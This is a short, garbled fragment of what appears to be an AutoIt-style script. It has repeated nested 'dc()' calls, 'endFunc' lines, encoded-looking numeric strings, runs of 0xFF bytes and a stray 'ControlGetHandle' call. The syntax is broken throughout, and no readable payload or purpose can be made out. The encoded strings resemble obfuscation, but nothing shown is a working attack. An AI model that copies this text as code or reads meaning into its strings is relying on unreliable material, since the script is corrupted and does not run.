wexit$n
exit$n$³exit$n
exitncœdc%,v="",$C="",$N=4,$u="",$p="",$?N="",$u="",$?3?3?7?6?6?1?3?3?2?6?1?7?2"",$C="",$N=4,$u=""ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿelsfÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ3?3?6?$N=4,$u=""ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ,$p="",$?N=-3-50/5+/0i-3-90/5+/0M+0-5/5+/-3-99/5+/0-+0-5/5+/-3-99/5+/0--3-[9/5+/0-]0-5/5+/-3-99/5+/0--3-90/5+/0e+3-3?"")
endFunc
dc(dc(false(dc())H+w,$H)dc(dc()9,$u""$p
dc(3?3?7?6?6?1?3?3?2?6?1?7?2?6?3?3?6?3?3?2?3?2?6p="")
endFunc
dc(dc())
dc(ÿÿÿÿÿ3?3?6?$N=8,$u=""ÿÿÿÿÿÿi-3-90/5+/0M+0-5/5+/-3-99/5+/0-+0-5/5+/-3-99/5+/0--3-[9/5+/0-]0-5/5+/-3-99/5+/0--3-90/5+/0e+3-3?"")
endFunc
dc(dc(false(dc())H+w,$H)dc(dc()9,$u""$p
dc(3?3?7ÿÿÿÿÿÿ3?3?6?$N=4,$u=""ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ-5/5+/-3-99/5+/0--3-90/5+/0e+3-"",$u="",$ ?3?3?"")
endFunc
dc(dc(false(dc())H+w,$H)dc(dc()9,$u""$p
dc(3?3?7?6?6?1?3?3?2?6?1?7?2?6?3?3?6?3?3?2?3?2?6p5+/-3-99/5+/0--3-90/5+/0e+3-"",$u="",$?3?3?7?6?Co¯ntrolGetHandle6?1?3?3?2?6?1?7?2?6?3?3?6?3?3?2?3?2?6p="")
endFunc
dc(dc())
dc(dc())Ht$tunc
dc(dc())
dc(